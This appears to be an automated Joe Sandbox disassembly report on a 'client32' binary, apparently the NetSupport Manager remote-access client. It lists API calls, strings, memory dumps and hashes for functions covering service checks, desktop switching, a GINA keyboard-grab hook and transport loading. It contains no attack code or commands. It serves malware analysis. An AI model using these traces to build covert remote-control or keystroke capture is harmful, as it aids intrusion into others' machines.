Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
API String ID: 1594747848-1114959992
Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5

Function 1102C850 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,7E4636A2), ref: 1102CA84
OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
Sleep.KERNEL32(00000032), ref: 1102CAC6
CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
Sleep.KERNEL32(000003E8), ref: 1102CB22
CloseHandle.KERNEL32(?), ref: 1102CB4F

Strings

>, xrefs: 1102C9FB
NSM.LIC, xrefs: 1102CB87, 1102CB9D, 1102CBCD
ProtectedStorage, xrefs: 1102CA94
NSA.LIC, xrefs: 1102CB96

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
API String ID: 83693535-2077998243
Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51

Function 1112FC80 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1112FCF0
GetTickCount.KERNEL32 ref: 1112FD21
SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
GetTickCount.KERNEL32 ref: 1112FD3C

Strings

CommonPath, xrefs: 1112FD5F
schplayer.exe, xrefs: 1112FD78
HasStudentComponents=%d, xrefs: 1112FDB7
Software\NSL, xrefs: 1112FD64
runplugin.exe, xrefs: 1112FCCE
%s%s, xrefs: 1112FCEA, 1112FD8E
Warning. SHGetFolderPath took %d ms, xrefs: 1112FD46

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FolderPathwsprintf
String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
API String ID: 1170620360-4157686185
Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92

Function 11030438 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6

GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
_sprintf.LIBCMT ref: 1103078D
_setlocale.LIBCMT ref: 11030797

Strings

.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F
pcicl32, xrefs: 11030851

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
String ID: .%d$Error %s unloading audiocap dll$pcicl32
API String ID: 3430446287-3899566344
Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52

Function 11141710 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
_memset.LIBCMT ref: 1114179D

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

_strncpy.LIBCMT ref: 1114186A

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

RegCloseKey.KERNEL32(00000000), ref: 11141906

Strings

Service Pack, xrefs: 1114194D
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 1114176B
CSDVersion, xrefs: 111417BA
CurrentMinorVersionNumber, xrefs: 111418D0
CurrentMajorVersionNumber, xrefs: 11141898
CurrentVersion, xrefs: 111417E4

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91

Function 11026810 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11026896
_strtok.LIBCMT ref: 110268D0
Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4

Strings

Client, xrefs: 11026886, 1102692B
LoadTransports(%d), xrefs: 1102690C
Retrying..., xrefs: 110269B2
Error. not all transports loaded (%d/%d), xrefs: 11026998
TCPIP, xrefs: 110268F2
Protocols, xrefs: 11026881
UseNCS, xrefs: 110268ED
*max_sessions, xrefs: 11026926

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$Sleep
String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
API String ID: 2009458258-3774545468
Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792

Function 68598D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,685A67B5), ref: 68598D6B

Part of subcall function 68594F70: LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78

GetCurrentProcessId.KERNEL32 ref: 68598DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68598DD8
FreeLibrary.KERNEL32(?), ref: 68598EBF

Part of subcall function 68594FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
Part of subcall function 68594FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE

Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034

Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E

Strings

is247, xrefs: 68598D42
NSM247Ctl.dll, xrefs: 68598E7E
CLIENT247, xrefs: 68598DA7
pcictl_247.dll, xrefs: 68598E6C
Set Is247=%d, xrefs: 68598ED7
NSM247, xrefs: 68598D8B

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
Instruction ID: ab8864ea8cf839c0dac882c909dfb3055c68c0a934503256c46ccfb76580efe1
Opcode Fuzzy Hash: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
Instruction Fuzzy Hash: C841F8759402599BEF10DB59DC55FFEB378EB45704FC00095EE29A2240EB319E84CF62

Function 110FFE60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON

Download Yara Rule

APIs

Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3

GetCurrentThreadId.KERNEL32 ref: 110FFE7C
GetThreadDesktop.USER32(00000000), ref: 110FFE83
OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
SetThreadDesktop.USER32(00000000), ref: 110FFEA0
CloseDesktop.USER32(00000000), ref: 110FFEB9
GetLastError.KERNEL32 ref: 110FFEC1
CloseDesktop.USER32(00000000), ref: 110FFED7
GetLastError.KERNEL32 ref: 110FFEDF

Strings

OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
SetThreadDesktop(%s) ok, xrefs: 110FFEAB
SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
API String ID: 2036220054-60805735
Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3

Function 1115AB80 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
GetLastError.KERNEL32 ref: 1115ABB5
wsprintfA.USER32 ref: 1115ABC8

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19

Strings

NSMDropTarget, xrefs: 1115AC0E
m_aProp, xrefs: 1115ABFA
..\ctl32\wndclass.cpp, xrefs: 1115ABD9, 1115ABF5
NSMWndClass, xrefs: 1115ABA0
NSMReflect, xrefs: 1115AC07
GlobalAddAtom failed, e=%d, xrefs: 1115ABC2

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A

Function 1110D060 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 1110D0CA
__CxxThrowException@8.LIBCMT ref: 1110D0DF
GetCurrentThreadId.KERNEL32 ref: 1110D0F6
InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF

Strings

..\ctl32\Refcount.cpp, xrefs: 1110D166
QueueThreadEvent, xrefs: 1110D16B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
